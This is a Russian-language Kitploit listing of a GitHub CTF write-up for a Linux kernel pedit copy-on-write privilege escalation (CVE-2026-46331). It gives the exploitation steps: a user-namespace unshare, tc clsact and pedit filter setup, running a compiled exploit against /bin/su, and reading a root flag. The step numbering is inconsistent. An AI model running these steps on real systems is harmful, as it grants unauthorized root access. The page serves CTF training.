Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-46331-pedit-cow — Описание и шаги эксплуатации уязвимости pedit COW (CVE-2026-46331) | Kitploit
Инструменты/GitHubGitHub/marwahhadi/cve-2026-46331-pedit-cow
Повышение привилегийЭксплуатацияCTFОбучение и ОбразованиеЭксплуатация Бинарных Файлов
GitHubmarwahhadi/cve-2026-46331-pedit-cow

CVE-2026-46331-pedit-cow

Описание и шаги эксплуатации уязвимости pedit COW (CVE-2026-46331)

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
11 месяц назадЕщё не проверено

CVE-2026-46331-pedit-cow

Описание и шаги эксплуатации уязвимости pedit COW (CVE-2026-46331).

Обзор

Это задание демонстрирует pedit COW, ошибку в ядре Linux в подсистеме управления трафиком, отвечающей за действие редактирования пакетов (act_pedit). Уязвимость позволяет непривилегированному пользователю перезаписать хранящуюся в памяти копию setuid-root бинарного файла, фактически получая root-оболочку, не затрагивая сам файл на диске.

Шаги эксплуатации

1. Начальная настройка

Среда запускается от имени непривилегированного пользователя (karen).

root@kitploit:~
id
cd ~/packet_edit_meme
make packet_edit_meme

2. Повышение привилегий (Создание пространства имён)

Обычно настройка управления трафиком требует привилегий CAP_NET_ADMIN, которых нет у обычного пользователя. Я использовал непривилегированные пользовательские пространства имён, чтобы получить эту возможность.

root@kitploit:~
unshare -r -n

3. Настройка действия управления трафиком

Внутри пространства имён я настроил дисциплину очереди clsact и применил фильтр для запуска действия pedit.

root@kitploit:~
# Clean up any existing configurations if needed

tc qdisc del dev lo clsact

root@kitploit:~
# Setup the qdisc and filter

tc qdisc add dev lo clsact

root@kitploit:~

tc filter add dev lo egress matchall action pedit ex munge ip ttl set 64

root@kitploit:~

### 5. Запуск эксплойта

После настройки среды я вышел из root-оболочки и запустил эксплойт от имени непривилегированного пользователя.

exit ./packet_edit_meme

root@kitploit:~

### 5. Финальный результат

Эксплойт успешно перезаписал запись для /bin/su, предоставив интерактивную root-оболочку.

cat /root/flag.txt

root@kitploit:~
THM{YOUR_FLAG_HERE}
Скачать инструмент